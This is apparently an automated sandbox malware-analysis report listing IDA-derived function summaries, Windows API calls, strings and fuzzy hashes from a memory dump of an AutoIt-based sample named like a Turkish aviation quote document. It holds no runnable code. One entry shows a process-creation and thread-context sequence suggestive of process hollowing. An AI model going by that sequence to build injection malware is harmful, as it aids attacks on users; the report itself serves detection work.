                                                                                                                                    control_flow_graph 1133 fc541d-fc5436 1134 fc5438-fc543d 1133->1134 1135 fc5453 1133->1135 1134->1135 1137 fc543f-fc5441 1134->1137 1136 fc5455-fc545b 1135->1136 1138 fc545c-fc5461 1137->1138 1139 fc5443-fc5448 call fc8b28 1137->1139 1140 fc546f-fc5473 1138->1140 1141 fc5463-fc546d 1138->1141 1151 fc544e call fc8db6 1139->1151 1144 fc5475-fc5480 call fc2de0 1140->1144 1145 fc5483-fc5485 1140->1145 1141->1140 1143 fc5493-fc54a2 1141->1143 1149 fc54a9 1143->1149 1150 fc54a4-fc54a7 1143->1150 1144->1145 1145->1139 1148 fc5487-fc5491 1145->1148 1148->1139 1148->1143 1153 fc54ae-fc54b3 1149->1153 1150->1153 1151->1135 1155 fc559c-fc559f 1153->1155 1156 fc54b9-fc54c0 1153->1156 1155->1136 1157 fc5501-fc5503 1156->1157 1158 fc54c2-fc54ca 1156->1158 1160 fc556d-fc556e call fd0ba7 1157->1160 1161 fc5505-fc5507 1157->1161 1158->1157 1159 fc54cc 1158->1159 1162 fc55ca 1159->1162 1163 fc54d2-fc54d4 1159->1163 1170 fc5573-fc5577 1160->1170 1165 fc5509-fc5511 1161->1165 1166 fc552b-fc5536 1161->1166 1169 fc55ce-fc55d7 1162->1169 1167 fc54db-fc54e0 1163->1167 1168 fc54d6-fc54d8 1163->1168 1171 fc5521-fc5525 1165->1171 1172 fc5513-fc551f 1165->1172 1173 fc5538 1166->1173 1174 fc553a-fc553d 1166->1174 1176 fc55a4-fc55a8 1167->1176 1177 fc54e6-fc54ff call fd0cc8 1167->1177 1168->1167 1169->1136 1170->1169 1178 fc5579-fc557e 1170->1178 1179 fc5527-fc5529 1171->1179 1172->1179 1173->1174 1175 fc553f-fc554b call fc46e6 call fd0e5b 1174->1175 1174->1176 1194 fc5550-fc5555 1175->1194 1180 fc55ba-fc55c5 call fc8b28 1176->1180 1181 fc55aa-fc55b7 call fc2de0 1176->1181 1193 fc5562-fc556b 1177->1193 1178->1176 1184 fc5580-fc5591 1178->1184 1179->1174 1180->1151 1181->1180 1189 fc5594-fc5596 1184->1189 1189->1155 1189->1156 1193->1189 1195 fc55dc-fc55e0 1194->1195 1196 fc555b-fc555e 1194->1196 1195->1169 1196->1162 1197 fc5560 1196->1197 1197->1193
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1559183368-0
                                                                                                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                    • Instruction ID: 8a188ed431c9feacafcd7be8e8355db4966a8051a5b1d7977aad34c25a78f64d
                                                                                                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                    • Instruction Fuzzy Hash: 8151B971E00A079BCB18CE65DE42F6D77A2AF40734F284A2DF425962D0D774ADD0AB40
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
                                                                                                                                    • _free.LIBCMT ref: 00FDE263
                                                                                                                                    • _free.LIBCMT ref: 00FDE2AA
                                                                                                                                      • Part of subcall function 00FA6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                    • API String ID: 2861923089-1757145024
                                                                                                                                    • Opcode ID: dfab0ebed2116fd8553b7fb9a65a3e2a55f371f3c232a9696aef0bf7cdb01fb6
                                                                                                                                    • Instruction ID: 82b1d0ce0f7b18c61386dabecfce0eb082517b9650b6a18ff1a6315c0cedef3b
                                                                                                                                    • Opcode Fuzzy Hash: dfab0ebed2116fd8553b7fb9a65a3e2a55f371f3c232a9696aef0bf7cdb01fb6
                                                                                                                                    • Instruction Fuzzy Hash: D9916D71D0021ADFCF04EFA4CC919EDB7B9FF15310F14442AE816AB2A1DB78A915EB50
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FA35A1,SwapMouseButtons,00000004,?), ref: 00FA35D4
                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA35F5
                                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA3617
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                    • Opcode ID: c0f27b0c4301a52f23abf08f3cc598f0660fddeb7370ba3043e24a52036023ee
                                                                                                                                    • Instruction ID: 160621ada81ecb27178079ce2936f2f70561a4523bee88cf2b2474798c0f2356
                                                                                                                                    • Opcode Fuzzy Hash: c0f27b0c4301a52f23abf08f3cc598f0660fddeb7370ba3043e24a52036023ee
                                                                                                                                    • Instruction Fuzzy Hash: D8112AB5911218BFDB208FA4D884EAFB7B8EF05750F11455AF805D7310E6719F50AB60
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01260065
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01260089
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012600AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                                    • Instruction ID: 733992321ba25621209095623f24fa87c8b622c2cbe57f8975814d218cf9ecbb
                                                                                                                                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                                    • Instruction Fuzzy Hash: AA620C30A24258DBEB24CFA4C841BDEB775EF58300F1091A9E20DEB2D4E7759E81DB59
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
                                                                                                                                      • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
                                                                                                                                      • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
                                                                                                                                    • _free.LIBCMT ref: 010096A2
                                                                                                                                    • _free.LIBCMT ref: 010096A9
                                                                                                                                    • _free.LIBCMT ref: 01009714
                                                                                                                                      • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
                                                                                                                                      • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
                                                                                                                                    • _free.LIBCMT ref: 0100971C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1552873950-0
                                                                                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                                    • Instruction ID: 81018b8c6aff4d2efa09c3ff0c439bfa93803e65ba7d91d22b64dfd6b411023b
                                                                                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                                    • Instruction Fuzzy Hash: 56513FB1D04259AFDF259F64CC81A9EBBB9FF88304F00449EB64DA3251DB755A80CF58
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2782032738-0
                                                                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                    • Instruction ID: 11fd8b5aa7f8a886f5900c817a044762034048a9e69d102e5f2cec970892d405
                                                                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                    • Instruction Fuzzy Hash: 0241B575E007479BDB188EA9CAA2FAE77A5AF81370B24813DE815C7680D774ED41AB40
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00FDEA39
                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00FDEA83
                                                                                                                                      • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                                                                                      • Part of subcall function 00FC0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                    • String ID: X
                                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                                    • Opcode ID: 268b8a51f011bc96f54aaca981ceefb596197797a2cc965ea70d59d3eae12e97
                                                                                                                                    • Instruction ID: f9d574cf4cb93988fe952b648e87f920816c3e3352cb9c463741e04d84b90991
                                                                                                                                    • Opcode Fuzzy Hash: 268b8a51f011bc96f54aaca981ceefb596197797a2cc965ea70d59d3eae12e97
                                                                                                                                    • Instruction Fuzzy Hash: 3C21C671A002499BCB519F94CC45BEE7BFDAF49314F04805AE848AB241DBB859899FA1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                                    • String ID: EA06
                                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                                    • Opcode ID: 6d54ba2e871cb0abe1ed4ea8365476acdf020f7ba0888edb0922c8a762591934
                                                                                                                                    • Instruction ID: ee3741144c25d59b86f5654ffedf26ff3f06f9cc79254e78a56f45f3a1040e9c
                                                                                                                                    • Opcode Fuzzy Hash: 6d54ba2e871cb0abe1ed4ea8365476acdf020f7ba0888edb0922c8a762591934
                                                                                                                                    • Instruction Fuzzy Hash: FA01F971C042187EDB19DAA9CC16FFE7BF8DB11701F00459FF592D2181E579E6049760
                                                                                                                                    APIs
                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 010098F8
                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0100990F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                    • String ID: aut
                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                    • Opcode ID: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                                                                                    • Instruction ID: 5eeb89e10f9ea7337118097439f4a057dea7a0df6f50fc3a3ed36be0497acabb
                                                                                                                                    • Opcode Fuzzy Hash: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                                                                                    • Instruction Fuzzy Hash: 90D05E7954030EABDB709EA0EC0EFAA773CE705700F1042A1FE94D5191EAB695988BA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                                                                                    • Instruction ID: 304708f059a1a4b31da32ca0164478eb317e6fada54abb4ce8adf86e11ecfe85
                                                                                                                                    • Opcode Fuzzy Hash: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                                                                                    • Instruction Fuzzy Hash: AEF168706083019FDB14DF28C980A6EBBE5FF89314F54896EF8999B251D778E905CF82
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                                                                                      • Part of subcall function 00FB60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FAF930), ref: 00FB6154
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FAF9CD
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00FAFA4A
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FE45C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                    • Opcode ID: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                                                                                    • Instruction ID: ed26bc26b7e6eb4b977ccc7c96886c3d9bc7f166b82bbb09198ffee63789b12a
                                                                                                                                    • Opcode Fuzzy Hash: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                                                                                    • Instruction Fuzzy Hash: DD81D1B0A01250CFC3A4DF39EC556597BE9FB9938AB5081AAD0D8CB369EB7E4404CF10
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00FA4370
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA4432
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1505330794-0
                                                                                                                                    • Opcode ID: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                                                                                    • Instruction ID: 6ce78b3c165a062d9dd6f3399d4366eae951f5391e3aaa8a60b2b2cc01c68b84
                                                                                                                                    • Opcode Fuzzy Hash: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                                                                                    • Instruction Fuzzy Hash: 053181B09047028FD731DF24D88469BBBF8FB9A358F00092EF5DA86241D7B5B944DB52
                                                                                                                                    APIs
                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                                                                                      • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA192
                                                                                                                                      • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA19C
                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                                                                                      • Part of subcall function 00FCA1C8: GetModuleFileNameW.KERNEL32(00000000,010633BA,00000104,?,00000001,00000000), ref: 00FCA25A
                                                                                                                                      • Part of subcall function 00FCA1C8: ___crtMessageBoxW.LIBCMT ref: 00FCA308
                                                                                                                                      • Part of subcall function 00FC309F: ___crtCorExitProcess.LIBCMT ref: 00FC30A5
                                                                                                                                      • Part of subcall function 00FC309F: ExitProcess.KERNEL32 ref: 00FC30AE
                                                                                                                                      • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                                                                                    • RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1372826849-0
                                                                                                                                    • Opcode ID: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                                                                                    • Instruction ID: d40958edd2aec18157dce7269f34f228146a7dead5a38277c1024339c972e226
                                                                                                                                    • Opcode Fuzzy Hash: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                                                                                    • Instruction Fuzzy Hash: 6D01D632640B1BDAD6202774AE43F6D77489F82BB1F50002DF4059A181DF79ACC17760
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01009548,?,?,?,?,?,00000004), ref: 010098BB
